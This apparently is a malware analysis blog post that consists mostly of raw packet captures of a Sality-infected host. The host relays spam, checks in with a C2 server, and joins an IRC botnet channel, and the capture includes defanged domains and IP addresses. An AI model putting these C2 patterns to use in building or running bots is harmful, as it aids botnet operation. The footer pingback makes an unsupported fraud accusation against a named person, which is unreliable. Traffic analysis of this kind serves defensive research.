2008-12-29 13:36:05.022163 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [.], ack 209, win 64032, length 0
E..(..@…….0….I….j.P..o_QP.. h…
2008-12-29 13:36:05.173013 IP 66.235.184.220.4022 > 168.131.48.151.10032: Flags [P.], seq 137:168, ack 217, win 65319, length 31
E..G..@.n.$.B…..0…’0…d.>..P..’.”..RCPT TO:

2008-12-29 13:36:05.173237 IP 168.131.48.151.1443 > 194.25.134.73.25: Flags [P.], seq 128:159, ack 209, win 64032, length 31
E..G..@…….0….I….j.P..o_QP.. ….RCPT TO:

2008-12-29 13:36:05.350281 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [.], ack 168, win 64073, length 0
E..(..@….j..0.B…’0…>……P..Iaa..
2008-12-29 13:36:05.471411 IP 194.25.134.73.25 > 168.131.48.151.1443: Flags [P.], seq 209:240, ack 159, win 5840, length 31
E..G.:@.2.7….I..0……o_Qj.P8P…}…250 2.1.5 Recipient accepted.

2008-12-29 13:36:05.471615 IP 168.131.48.151.10032 > 66.235.184.220.4022: Flags [P.], seq 217:248, ack 168, win 64073, length 31
E..G..@….J..0.B…’0…>……P..I….250 2.1.5 Recipient accepted.

2008-12-29 13:46:05.303000 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [P.], seq 1:176, ack 1, win 64240, length 175
E…..@…….0.Y….0.P……..P….x..GET /utest/?jutr=70224&oo=2&12e883=845b95&ra=3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 89.149.227.194
Cache-Control: no-cache

2008-12-29 13:46:05.303000 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [P.], seq 1:176, ack 1, win 64240, length 175
E…..@…….0.Y….0.P……..P….x..GET /utest/?jutr=70224&oo=2&12e883=845b95&ra=3 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 89.149.227.194
Cache-Control: no-cache

2008-12-29 13:46:05.608298 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [.], ack 176, win 6432, length 0
E..(.f@.3.m.Y…..0..P.0……..P.. .h……..
2008-12-29 13:46:05.608298 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [.], ack 176, win 6432, length 0
E..(.f@.3.m.Y…..0..P.0……..P.. .h……..
2008-12-29 13:46:05.609088 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [S], seq 96089794, win 5840, options [mss 1460,sackOK,TS val 431625594 ecr 0,nop,wscale 6], length 0
E..<#.@.3...Y.....0...'0..6..........0......... ...z........ 2008-12-29 13:46:05.609241 IP 168.131.48.151.10032 > 89.149.227.194.41133: Flags [S.], seq 2412816989, ack 96089795, win 64240, options [mss 1460,nop,wscale 0,nop,nop,TS val 0 ecr 0,nop,nop,sackOK], length 0
E..@..@….1..0.Y…’0…..]..6………………..
…………
2008-12-29 13:46:05.906305 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [.], ack 1, win 92, options [nop,nop,TS val 431625668 ecr 0], length 0
E..4#.@.3…Y…..0…’0..6….^…\…….
……..
2008-12-29 13:46:05.906899 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [F.], seq 1, ack 1, win 92, options [nop,nop,TS val 431625668 ecr 0], length 0
E..4#.@.3…Y…..0…’0..6….^…\…….
……..
2008-12-29 13:46:05.906904 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [P.], seq 1:190, ack 176, win 6432, length 189
E….g@.3.m9Y…..0..P.0……..P.. ….HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Mon, 29 Dec 2008 17:41:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.0-8+etch11

0

2008-12-29 13:46:05.906904 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [P.], seq 1:190, ack 176, win 6432, length 189
E….g@.3.m9Y…..0..P.0……..P.. ….HTTP/1.1 200 OK
Server: nginx/0.4.13
Date: Mon, 29 Dec 2008 17:41:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.0-8+etch11

0

2008-12-29 13:46:05.906908 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [F.], seq 190, ack 176, win 6432, length 0
E..(.h@.3.m.Y…..0..P.0……..P.. ……….
2008-12-29 13:46:05.906908 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [F.], seq 190, ack 176, win 6432, length 0
E..(.h@.3.m.Y…..0..P.0……..P.. ……….
2008-12-29 13:46:05.907059 IP 168.131.48.151.10032 > 89.149.227.194.41133: Flags [.], ack 2, win 64240, options [nop,nop,TS val 12345 ecr 431625668], length 0
E..4..@….<..0.Y...'0.....^..6............ ..09.... 2008-12-29 13:46:05.907092 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [.], ack 191, win 64051, length 0
E..(..@….G..0.Y….0.P……..P..3….
2008-12-29 13:46:05.907092 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [.], ack 191, win 64051, length 0
E..(..@….G..0.Y….0.P……..P..3….
2008-12-29 13:46:05.907203 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [F.], seq 176, ack 191, win 64051, length 0
E..(..@….F..0.Y….0.P……..P..3….
2008-12-29 13:46:05.907203 IP 168.131.48.151.1840 > 89.149.227.194.80: Flags [F.], seq 176, ack 191, win 64051, length 0
E..(..@….F..0.Y….0.P……..P..3….
2008-12-29 13:46:05.907342 IP 168.131.48.151.10032 > 89.149.227.194.41133: Flags [F.], seq 1, ack 2, win 64240, options [nop,nop,TS val 12345 ecr 431625668], length 0
E..4..@….9..0.Y…’0…..^..6…………
..09….
2008-12-29 13:46:06.205332 IP 89.149.227.194.41133 > 168.131.48.151.10032: Flags [.], ack 2, win 92, options [nop,nop,TS val 431625743 ecr 12345], length 0
E..4..@.3.1RY…..0…’0..6…._…\.`…..
……09
2008-12-29 13:46:06.212714 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [.], ack 177, win 6432, length 0
E..(..@.3.1^Y…..0..P.0……..P.. ……….
2008-12-29 13:46:06.212714 IP 89.149.227.194.80 > 168.131.48.151.1840: Flags [.], ack 177, win 6432, length 0
E..(..@.3.1^Y…..0..P.0……..P.. ……….
2008-12-29 13:46:06.704522 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 1, win 64240, length 58
E..b..@…….0.SD…”
.}.Q…PP…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:46:08.979233 IP 168.131.48.89.53 > 168.131.48.151.1800: 35195 ServFail 0/0/0 (37)
E..A..@.@…..0Y..0..5…-a..{………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:08.979403 IP 168.131.48.151 > 168.131.48.89: ICMP 168.131.48.151 udp port 1800 unreachable, length 73
E..].+….n~..0…0Y…2….E..A..@.@…..0Y..0..5…-a..{………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:11.006840 IP 168.131.48.151.1842 > 168.131.48.89.53: 11627+ A? proxim.ircgalaxy[.]pl. (37)
E..A.,….n…0…0Y.2.5.->J-k………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:11.202529 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [S.], seq 2983467599, ack 2591924817, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@.4.
dSD….0.
.”…O.}.Qp……………
2008-12-29 13:46:11.202667 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1, win 64240, length 0
E..(.-@….>..0.SD…”
.}…..PP…^&..
2008-12-29 13:46:12.004231 IP 168.131.48.151.1842 > 210.220.163.82.53: 11627+ A? proxim.ircgalaxy[.]pl. (37)
E..A.4……..0….R.2.5.-..-k………..proxim ircgalaxy[.]pl…..
2008-12-29 13:46:12.011748 IP 210.220.163.82.53 > 168.131.48.151.1842: 11627* 1/0/0 A 127.0.0.1 (53)
E..Q..@……..R..0..5.2.=..-k………..proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:46:18.746386 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 1, win 64240, length 58
E..b.?@…….0.SD…”
.}.Q…PP…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:46:42.675254 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 1, win 64240, length 58
E..b.v……..0.SD…”
.}.Q…PP…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:46:43.040734 IP 168.131.48.151.1846 > 168.131.48.89.53: 58030+ A? proxim.ircgalaxy[.]pl. (37)
E..A.w….n>..0…0Y.6.5.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:46:44.036505 IP 168.131.48.151.1846 > 210.220.163.82.53: 58030+ A? proxim.ircgalaxy[.]pl. (37)
E..A.x……..0….R.6.5.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:46:44.043433 IP 210.220.163.82.53 > 168.131.48.151.1846: 58030* 1/0/0 A 127.0.0.1 (53)
E..Q!.@….$…R..0..5.6.=.}………….proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:46:47.409584 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [S.], seq 2983467599, ack 2591924817, win 5840, options [mss 1460,nop,nop,sackOK], length 0
E..0..@.4.
dSD….0.
.”…O.}.Qp……………
2008-12-29 13:46:47.409750 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1, win 64240, length 0
E..(……….0.SD…”
.}…..PP…^&..
2008-12-29 13:46:49.354801 IP 168.131.48.151.1159 > 143.215.15.205.80: Flags [.], seq 1:2, ack 1, win 64240, length 1
E..)..@…g…0……..P..gj….P….G..G
2008-12-29 13:46:49.569068 IP 143.215.15.205.80 > 168.131.48.151.1159: Flags [.], ack 1, win 0, length 0
E..(..@………..0..P……..gjP….9……..
2008-12-29 13:46:51.935360 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 1:113, ack 1, win 5840, length 112
E…..@.4.4.SD….0.
.”…P.}.QP…….NOTICE AUTH :*** Looking up your hostname…
NOTICE AUTH :*** Checking Ident
NOTICE AUTH :*** No Ident response

2008-12-29 13:46:52.092124 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 113, win 64128, length 0
E..(……….0.SD…”
.}……P…^&..
2008-12-29 13:47:06.745488 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 1:59, ack 113, win 64128, length 58
E..b……….0.SD…”
.}.Q….P…. ..USER linid linid linid :Administrator
NICK [LZ]fIoXWVdy

2008-12-29 13:47:07.113562 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [.], ack 59, win 5840, length 0
E..(..@.4.4pSD….0.
.”…..}..P…A………
2008-12-29 13:47:07.150572 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 113:1113, ack 59, win 5840, length 1000
E…..@.4.0.SD….0.
.”…..}..P…#2..:norks.org 001 [LZ]fIoXWVdy :Welcome to the Internet Relay Network [LZ]fIoXWVdy
:norks.org 002 [LZ]fIoXWVdy :Your host is localhost, running version 2.9/hybrid-6.3
NOTICE [LZ]fIoXWVdy :*** Your host is localhost, running version 2.9/hybrid-6.3
:norks.org 003 [LZ]fIoXWVdy :This server was created Thu Dec 6 2001 at 11:52:49 GMT
:norks.org 004 [LZ]fIoXWVdy norks.org 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve
:norks.org 251 [LZ]fIoXWVdy :There are 2 users and 0 invisible on 1 servers
:norks.org 255 [LZ]fIoXWVdy :I have 2 clients and 0 servers
:norks.org 265 [LZ]fIoXWVdy :Current local users: 2 Max: 2
:norks.org 266 [LZ]fIoXWVdy :Current global users: 2 Max: 2
:norks.org 250 [LZ]fIoXWVdy :Highest connection count: 2 (2 clients) (2 since server was (re)started)
:norks.org 375 [LZ]fIoXWVdy :- norks.org Message of the Day –
:norks.org 372 [LZ]fIoXWVdy :- Where’s the kaboom? There was supposed to be an earth shattering kaboom.
:norks.org 376 [LZ]fIoXWVdy :End of /MOTD command.

2008-12-29 13:47:07.151007 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 59:82, ack 1113, win 64240, length 23
E..?……….0.SD…”
.}……P….-..MODE [LZ]fIoXWVdy +xi

2008-12-29 13:47:07.559193 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [.], ack 82, win 5840, length 0
E..(..@.4.4nSD….0.
.”…..}..P…=………
2008-12-29 13:47:07.559352 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [P.], seq 82:97, ack 1113, win 64240, length 15
E..7……….0.SD…”
.}……P…=…JOIN #zebras

2008-12-29 13:47:08.343018 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 1163:1453, ack 118, win 5840, length 290
E..J..@.4.3ISD….0.
.”…..}..P…….:norks.org MODE #zebras +nt
:norks.org 353 [LZ]fIoXWVdy = #zebras :@wloos [LZ]fIoXWVdy
:norks.org 366 [LZ]fIoXWVdy #zebras :End of /NAMES list.
:norks.org 332 [LZ]fIoXWVdy #zebras :
:norks.org 333 [LZ]fIoXWVdy #zebras [LZ]fIoXWVdy 1230572831
:wloos!~wloos@norks.org PRIVMSG #zebras :

2008-12-29 13:47:08.497394 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1453, win 63900, length 0
E..(……….0.SD…”
.}……P…Y…
2008-12-29 13:47:08.863647 IP 83.68.16.6.2569 > 168.131.48.151.1826: Flags [P.], seq 1453:1556, ack 118, win 5840, length 103
E…..@.4.4.SD….0.
.”…..}..P…….:norks.org 324 [LZ]fIoXWVdy #zebras +smntu +tn
:norks.org 329 [LZ]fIoXWVdy #zebras +smntu 1230572831

2008-12-29 13:47:09.044260 IP 168.131.48.151.1826 > 83.68.16.6.2569: Flags [.], ack 1556, win 63797, length 0
E..(……….0.SD…”
.}…. cP..5Y…
2008-12-29 13:47:13.043800 IP 168.131.48.89.53 > 168.131.48.151.1846: 58030 ServFail 0/0/0 (37)
E..A..@.@…..0Y..0..5.6.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:13.043968 IP 168.131.48.151 > 168.131.48.89: ICMP 168.131.48.151 udp port 1846 unreachable, length 73
E..]……m…0…0Y…2….E..A..@.@…..0Y..0..5.6.-……………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:14.956391 IP 168.131.48.151.1074 > 143.215.15.145.80: Flags [.], seq 1:2, ack 1, win 64240, length 1
E..)..@…g_..0……2.P..]….1P….c..G
2008-12-29 13:47:15.099995 IP 168.131.48.151.1855 > 168.131.48.89.53: 12509+ A? proxim.ircgalaxy[.]pl. (37)
E..A……m…0…0Y.?.5.-:.0…………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:15.172497 IP 143.215.15.145.80 > 168.131.48.151.1074: Flags [.], ack 1, win 0, length 0
E..(..@….M……0..P.2…1..].P…IU……..
2008-12-29 13:47:16.099072 IP 168.131.48.151.1855 > 210.220.163.82.53: 12509+ A? proxim.ircgalaxy[.]pl. (37)
E..A…….s..0….R.?.5.-.x0…………proxim ircgalaxy[.]pl…..
2008-12-29 13:47:16.106517 IP 210.220.163.82.53 > 168.131.48.151.1855: 12509* 1/0/0 A 127.0.0.1 (53)
E..Q..@……..R..0..5.?.=.F0…………proxim ircgalaxy[.]pl………….Q…….
2008-12-29 13:47:19.406661 IP 217.171.192.14.18664 > 168.131.48.151.113: Flags [S], seq 1518191487, win 5840, options [mss 1364,sackOK,TS val 197012450 ecr 0,nop,wscale 0], length 0
E..<..@.+..)......0.H..qZ}.................T... ..+......... 2008-12-29 13:47:19.406851 IP 168.131.48.151.113 > 217.171.192.14.18664: Flags [S.], seq 3782440357, ack 1518191488, win 64240, options [mss 1460,nop,wscale 0,nop,nop,TS val 0 ecr 0,nop,nop,sackOK], length 0
E..@..@…l…0……qH..su.Z}…… …………..
…………
2008-12-29 13:47:19.729875 IP 217.171.192.14.18664 > 168.131.48.151.113: Flags [.], ack 1, win 5840, options [nop,nop,TS val 197012774 ecr 0], length 0
E..4[.@.+..J……0.H..qZ}…su…………
..-&….
2008-12-29 13:47:19.729883 IP 217.171.192.14.18664 > 168.131.48.151.113: Flags [P.], seq 1:12, ack 1, win 5840, options [nop,nop,TS val 197012774 ecr 0], length 11
E..?n.@.+.nT……0.H..qZ}…su…………
..-&….1857 , 25

2008-12-29 13:47:19.730232 IP 168.131.48.151.113 > 217.171.192.14.18664: Flags [P.], seq 1:39, ack 12, win 64229, options [nop,nop,TS val 13084 ecr 197012774], length 38
E..Z..@…l…0……qH..su.Z}……pY…..
..3…-&1857 , 25
: USERID : UNIX : linid
2008-12-29 13:48:29.119814 IP 168.131.48.151.10032 > 66.235.184.220.3441: Flags [P.], seq 9:537, ack 10, win 64231, length 528
E..8.:@…….0.B…’0.q……T.P…….220-mail.austrogate.net ESMTP IceWarp 9.4.0; Mon, 29 Dec 2008 18:48:47 +0100
220-*********************************************************************
220-* Secure Mail Server *
220-* *
220-* All connections are logged! *
220-* This server employs anti-virus and anti-spam technology *
220 *********************************************************************

2008-12-29 13:48:29.378474 IP 66.235.184.220.3441 > 168.131.48.151.10032: Flags [P.], seq 10:29, ack 537, win 64999, length 19
E..;).@.n…B…..0..q’0..T…..P…….HELO politico[.]com

2008-12-29 13:48:29.541457 IP 168.131.48.151.10032 > 66.235.184.220.3441: Flags [.], ack 29, win 64212, length 0
E..(.=@… …0.B…’0.q……T.P…….
2008-12-29 13:48:29.707397 IP 168.131.48.151.10032 > 66.235.184.220.3441: Flags [P.], seq 537:620, ack 29, win 64212, length 83
E..{.>@… ]..0.B…’0.q……T.P…….250 mail.austrogate.net Hello politico[.]com [80.190.246.218], pleased to meet you.

2008-12-29 13:48:30.025500 IP 66.235.184.220.3441 > 168.131.48.151.10032: Flags [P.], seq 29:65, ack 620, win 64916, length 36
E..L/.@.n…B…..0..q’0..T…..P…….MAIL FROM:
2009-06-04 15:09:58.223734 IP 121.12.116.142.65520 > 168.131.48.242.1026: Flags [P.], seq 944:954, ack 1930, win 65535, length 10
E..2..@./…y.t…0…..p…….P…….PING :m.

2009-06-04 15:09:58.224345 IP 168.131.48.242.1026 > 121.12.116.142.65520: Flags [P.], seq 1930:1939, ack 954, win 64582, length 9
E..1..@…….0.y.t………p…P..F….PONG :m.
2009-06-04 15:09:58.415594 IP 121.12.116.142.65520 > 168.131.48.242.1026: Flags [.], ack 1939, win 65535, length 0
E..(..@./…y.t…0…..p…….P…E………
2009-06-04 15:09:58.415772 IP 168.131.48.242.1026 > 121.12.116.142.65520: Flags [P.], seq 1939:1951, ack 954, win 64582, length 12
E..4..@…….0.y.t………p…P..F7…JOIN &virtu

Share Button

One thought on “Awesome Malware Sality Trojan Turns into IRC Botnet User Level Compromise

  1. Pingback: Margaret Cunniffe is an Australian Fraudster based in Melbourne Victoria who abuses those closest to her to achieve her selfish objectives.

Leave a Reply

Your email address will not be published. Required fields are marked *